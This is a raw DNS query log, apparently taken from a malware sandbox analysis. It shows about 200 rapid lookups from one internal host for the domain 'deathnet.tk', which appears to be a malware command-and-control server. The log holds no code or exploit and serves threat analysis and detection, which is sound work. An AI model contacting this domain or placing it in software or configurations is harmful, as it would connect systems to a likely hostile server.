              Mar 21, 2022 20:09:14.634545088 CET192.168.2.238.8.8.80x656eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.678580046 CET192.168.2.238.8.8.80x14beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.725840092 CET192.168.2.238.8.8.80x30f0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.774210930 CET192.168.2.238.8.8.80x4124Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.818825960 CET192.168.2.238.8.8.80xb0a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.864150047 CET192.168.2.238.8.8.80x2caaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.910653114 CET192.168.2.238.8.8.80xc432Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:14.957035065 CET192.168.2.238.8.8.80x8182Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:15.037863016 CET192.168.2.238.8.8.80xbc14Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:15.131551027 CET192.168.2.238.8.8.80x31c3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.136111021 CET192.168.2.238.8.8.80x31c3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.181060076 CET192.168.2.238.8.8.80x888Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.225657940 CET192.168.2.238.8.8.80x157eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.282546997 CET192.168.2.238.8.8.80xc06eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.325133085 CET192.168.2.238.8.8.80x580aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.369492054 CET192.168.2.238.8.8.80x3760Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.413007975 CET192.168.2.238.8.8.80xc9adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.459527016 CET192.168.2.238.8.8.80xcd3eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.504745007 CET192.168.2.238.8.8.80x9052Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.549628973 CET192.168.2.238.8.8.80xc35Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.621754885 CET192.168.2.238.8.8.80x1740Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.667324066 CET192.168.2.238.8.8.80xbc2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.710136890 CET192.168.2.238.8.8.80x62e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.755194902 CET192.168.2.238.8.8.80x6fc7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.801333904 CET192.168.2.238.8.8.80x7bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.846517086 CET192.168.2.238.8.8.80xb4deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.891885996 CET192.168.2.238.8.8.80x8448Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.938838959 CET192.168.2.238.8.8.80xf2bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:20.981585026 CET192.168.2.238.8.8.80x7462Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.027441025 CET192.168.2.238.8.8.80x7485Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.072643995 CET192.168.2.238.8.8.80xfec0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.116453886 CET192.168.2.238.8.8.80xe933Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.160582066 CET192.168.2.238.8.8.80x5c31Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.205406904 CET192.168.2.238.8.8.80x18b9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.251034021 CET192.168.2.238.8.8.80x3bb6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.293448925 CET192.168.2.238.8.8.80xeff5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.339066029 CET192.168.2.238.8.8.80x5eebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.381223917 CET192.168.2.238.8.8.80x93adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.426321030 CET192.168.2.238.8.8.80x6b5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.470926046 CET192.168.2.238.8.8.80xfea5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.514429092 CET192.168.2.238.8.8.80xd6bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.559006929 CET192.168.2.238.8.8.80x6166Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.603993893 CET192.168.2.238.8.8.80xd502Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.649303913 CET192.168.2.238.8.8.80x50efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.698483944 CET192.168.2.238.8.8.80x237dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.743130922 CET192.168.2.238.8.8.80xe490Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.788028955 CET192.168.2.238.8.8.80x955dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.833152056 CET192.168.2.238.8.8.80x8deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.881700993 CET192.168.2.238.8.8.80x900eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.943814993 CET192.168.2.238.8.8.80x4a2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:21.989166021 CET192.168.2.238.8.8.80x492fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.032190084 CET192.168.2.238.8.8.80xc692Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.077126980 CET192.168.2.238.8.8.80x341cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.122262001 CET192.168.2.238.8.8.80x6d9dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.171472073 CET192.168.2.238.8.8.80x66f9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.216195107 CET192.168.2.238.8.8.80x12b5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.259445906 CET192.168.2.238.8.8.80xdf70Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.303364038 CET192.168.2.238.8.8.80x96efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.346074104 CET192.168.2.238.8.8.80x4134Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.392122030 CET192.168.2.238.8.8.80xd95Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.436072111 CET192.168.2.238.8.8.80xfd25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.480921030 CET192.168.2.238.8.8.80xe013Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.526670933 CET192.168.2.238.8.8.80xd455Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.571717024 CET192.168.2.238.8.8.80x845bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.616595984 CET192.168.2.238.8.8.80xc223Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.661840916 CET192.168.2.238.8.8.80x56d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.705604076 CET192.168.2.238.8.8.80xcd52Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.748286009 CET192.168.2.238.8.8.80x68cfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.793080091 CET192.168.2.238.8.8.80x4cb6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.836009026 CET192.168.2.238.8.8.80x79f4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.879323959 CET192.168.2.238.8.8.80xa9d3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.924252033 CET192.168.2.238.8.8.80xc828Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:22.969685078 CET192.168.2.238.8.8.80xdc9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.014522076 CET192.168.2.238.8.8.80x39bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.059271097 CET192.168.2.238.8.8.80xd457Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.103595018 CET192.168.2.238.8.8.80x4952Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.148859024 CET192.168.2.238.8.8.80xb5f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.195714951 CET192.168.2.238.8.8.80x452eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.241700888 CET192.168.2.238.8.8.80x68ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.288070917 CET192.168.2.238.8.8.80xdf21Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.331327915 CET192.168.2.238.8.8.80xb0e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.376353025 CET192.168.2.238.8.8.80xf351Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.419919014 CET192.168.2.238.8.8.80x4419Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.466646910 CET192.168.2.238.8.8.80x90a1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:23.509458065 CET192.168.2.238.8.8.80x641dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.571515083 CET192.168.2.238.8.8.80x8357Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.617089033 CET192.168.2.238.8.8.80x5769Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.663079023 CET192.168.2.238.8.8.80x48c4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.710141897 CET192.168.2.238.8.8.80xdda0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.756586075 CET192.168.2.238.8.8.80x327cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.799612999 CET192.168.2.238.8.8.80x58f9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.844520092 CET192.168.2.238.8.8.80x88beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.889245987 CET192.168.2.238.8.8.80xbe98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.934530973 CET192.168.2.238.8.8.80xe8cdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.977993011 CET192.168.2.238.8.8.80x28c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.023077965 CET192.168.2.238.8.8.80x7ae7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.066576958 CET192.168.2.238.8.8.80x8fa4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.114052057 CET192.168.2.238.8.8.80xa319Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.166110992 CET192.168.2.238.8.8.80x9ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.214282990 CET192.168.2.238.8.8.80x8df4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.259176016 CET192.168.2.238.8.8.80xdb94Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.303877115 CET192.168.2.238.8.8.80xbf28Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.346889019 CET192.168.2.238.8.8.80xadf1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.391793966 CET192.168.2.238.8.8.80xf246Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.436621904 CET192.168.2.238.8.8.80xe69eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.490724087 CET192.168.2.238.8.8.80x4790Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.537976027 CET192.168.2.238.8.8.80x557eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.586925030 CET192.168.2.238.8.8.80x5ec9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.634546041 CET192.168.2.238.8.8.80x4b3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.692023993 CET192.168.2.238.8.8.80x46dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.738746881 CET192.168.2.238.8.8.80xc59cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.785731077 CET192.168.2.238.8.8.80x9453Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.834542036 CET192.168.2.238.8.8.80xfd95Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.880033016 CET192.168.2.238.8.8.80xdc89Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.926624060 CET192.168.2.238.8.8.80x37e7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.971649885 CET192.168.2.238.8.8.80x38bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.022023916 CET192.168.2.238.8.8.80x6ebaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.073229074 CET192.168.2.238.8.8.80x5a7eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.119494915 CET192.168.2.238.8.8.80xd01cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.164280891 CET192.168.2.238.8.8.80x6621Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.210671902 CET192.168.2.238.8.8.80x60a8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.257270098 CET192.168.2.238.8.8.80xee16Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.304121017 CET192.168.2.238.8.8.80x4144Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.350764036 CET192.168.2.238.8.8.80xbf91Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.394012928 CET192.168.2.238.8.8.80xfd49Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.440289021 CET192.168.2.238.8.8.80xc711Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.485948086 CET192.168.2.238.8.8.80x9ee1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.531694889 CET192.168.2.238.8.8.80x5329Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.575953960 CET192.168.2.238.8.8.80xde1bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.621577978 CET192.168.2.238.8.8.80xc391Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.666074991 CET192.168.2.238.8.8.80x812aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.710295916 CET192.168.2.238.8.8.80x7602Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.755417109 CET192.168.2.238.8.8.80x4e32Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.798532963 CET192.168.2.238.8.8.80xb0b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.842694998 CET192.168.2.238.8.8.80x7e75Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.885998011 CET192.168.2.238.8.8.80xeae1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.931852102 CET192.168.2.238.8.8.80xf9d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.976650953 CET192.168.2.238.8.8.80x8584Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.019706011 CET192.168.2.238.8.8.80xc03cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.063299894 CET192.168.2.238.8.8.80x13dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.109687090 CET192.168.2.238.8.8.80x4598Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.152849913 CET192.168.2.238.8.8.80x1056Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.198218107 CET192.168.2.238.8.8.80x5c36Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.246829987 CET192.168.2.238.8.8.80xd91dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.291712999 CET192.168.2.238.8.8.80xcadcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.336791992 CET192.168.2.238.8.8.80xe809Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.381328106 CET192.168.2.238.8.8.80x533aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.428570986 CET192.168.2.238.8.8.80x1c2dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.475116014 CET192.168.2.238.8.8.80x4439Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.519531965 CET192.168.2.238.8.8.80x7574Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.573707104 CET192.168.2.238.8.8.80xb07cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.616257906 CET192.168.2.238.8.8.80x3369Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.659492970 CET192.168.2.238.8.8.80x2290Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.707770109 CET192.168.2.238.8.8.80xc7fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.753829002 CET192.168.2.238.8.8.80x74aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.798839092 CET192.168.2.238.8.8.80x29fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.844733953 CET192.168.2.238.8.8.80x9c89Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.889883041 CET192.168.2.238.8.8.80xc0aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.936136961 CET192.168.2.238.8.8.80x37ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.984074116 CET192.168.2.238.8.8.80xecbdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.032181978 CET192.168.2.238.8.8.80xd7e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.075422049 CET192.168.2.238.8.8.80x5770Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.121618986 CET192.168.2.238.8.8.80x78eeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.164329052 CET192.168.2.238.8.8.80x57bbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.206970930 CET192.168.2.238.8.8.80x4b84Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.252214909 CET192.168.2.238.8.8.80xe1f2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.297135115 CET192.168.2.238.8.8.80x2409Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.343835115 CET192.168.2.238.8.8.80x9409Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.389913082 CET192.168.2.238.8.8.80xf7afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.438254118 CET192.168.2.238.8.8.80xa8dbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.483086109 CET192.168.2.238.8.8.80x712fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.526293039 CET192.168.2.238.8.8.80x231bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.572865963 CET192.168.2.238.8.8.80x71d8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.620670080 CET192.168.2.238.8.8.80x5383Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.672148943 CET192.168.2.238.8.8.80x14b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.729862928 CET192.168.2.238.8.8.80x3478Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.773788929 CET192.168.2.238.8.8.80xcdd6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.819226027 CET192.168.2.238.8.8.80x710eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.867665052 CET192.168.2.238.8.8.80x7560Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.912678957 CET192.168.2.238.8.8.80xe147Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.957616091 CET192.168.2.238.8.8.80xdda8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.999841928 CET192.168.2.238.8.8.80xc4ccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.045130014 CET192.168.2.238.8.8.80x8150Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.088910103 CET192.168.2.238.8.8.80x4d74Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.137229919 CET192.168.2.238.8.8.80xe24dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.186316967 CET192.168.2.238.8.8.80x255eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.231141090 CET192.168.2.238.8.8.80xa9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.274785042 CET192.168.2.238.8.8.80x5acStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.319457054 CET192.168.2.238.8.8.80xaf10Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.364779949 CET192.168.2.238.8.8.80x639bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.407746077 CET192.168.2.238.8.8.80x9654Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.455678940 CET192.168.2.238.8.8.80xd56bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.503858089 CET192.168.2.238.8.8.80x7ac7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.549925089 CET192.168.2.238.8.8.80xc49eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.594661951 CET192.168.2.238.8.8.80x9565Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.664674997 CET192.168.2.238.8.8.80xe4c6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.713340044 CET192.168.2.238.8.8.80x572eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.759180069 CET192.168.2.238.8.8.80x8172Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.805461884 CET192.168.2.238.8.8.80x34fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.854618073 CET192.168.2.238.8.8.80x7e0fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.901096106 CET192.168.2.238.8.8.80x694dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.951920986 CET192.168.2.238.8.8.80xfb35Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.997680902 CET192.168.2.238.8.8.80xb30aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.046581030 CET192.168.2.238.8.8.80xb6c4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.099037886 CET192.168.2.238.8.8.80x3fdaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.147742987 CET192.168.2.238.8.8.80xdf2bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.193516016 CET192.168.2.238.8.8.80x5f8dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.257863045 CET192.168.2.238.8.8.80x23b7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.306283951 CET192.168.2.238.8.8.80xcccaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.352221012 CET192.168.2.238.8.8.80xc8dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.397510052 CET192.168.2.238.8.8.80x2816Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.442575932 CET192.168.2.238.8.8.80x7024Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.489518881 CET192.168.2.238.8.8.80xb352Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.535615921 CET192.168.2.238.8.8.80x4aa8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.580296993 CET192.168.2.238.8.8.80xbd4cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.626348019 CET192.168.2.238.8.8.80x4766Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.675443888 CET192.168.2.238.8.8.80xb5bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.723453045 CET192.168.2.238.8.8.80x6e81Standard query (0)deathnet.tkA (IP address)IN (0x0001)
